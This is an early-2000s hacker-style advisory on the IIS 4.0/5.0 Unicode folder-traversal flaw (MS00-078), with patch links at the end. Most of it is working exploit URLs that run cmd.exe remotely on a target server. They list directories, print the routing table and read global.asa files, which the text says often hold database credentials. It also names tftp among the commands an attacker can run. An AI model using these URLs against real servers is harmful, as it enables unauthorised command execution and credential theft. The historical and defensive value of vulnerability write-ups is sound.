Remote control of IIS Windows 09/22/2001

Products Affected: Internet Information Services (IIS) 4.0 & 5.0
OS: Windows NT Windows 2000

Description:
Run commands remotely on IIS
This article describe the "Web Server Folder Traversal" security vulnerability in Internet Information Server (IIS).

Advisory:
By simply passing a url to a machine that is exploitable you can run any command directly on the remote machine. Remember this is for EDUCATIONAL USE ONLY and should only be run on your own machine.

For example:

First you can list all the files in a directory by using this: (Change localhost with the domainname of the server)
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+dir+C:

you can view any file on the system by changing the "C:" to any directory for example c:\inetpub

Now for more advanced users you can run commands by using:
http://localhost/scripts/..%c1%9c../winnt/system32/route.exe?PRINT

This example will print a copy of the routing table directly to your browser. You can run any exe that will give output from this line such as netstat, ipconfig, tftp, etc.

Now lets say you find something interesting on the machines harddrive - for example if someone is a crappy ASP programmer they will use the global.asa to hold all the database connection info. Now if your curious enough and your familiar with IIS you know where to find this at - i'm not going to hold your hand.

To view files of interest you would simply use this url:
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+type+C:\inetpub\wwwroot\directory\global.asa

This will 'type' the files contents to your browser - in other words you can view all the source code instead of executing it on the server.

Fix:
Microsoft IIS 4.0:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862

Microsoft IIS 5.0:
http://www.microsoft.com/windows2000/downloads/critical/q269862

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/Security/Bulletin/ms00-078.asp

Credits:
rOOtless@astalavista.com ->Core Member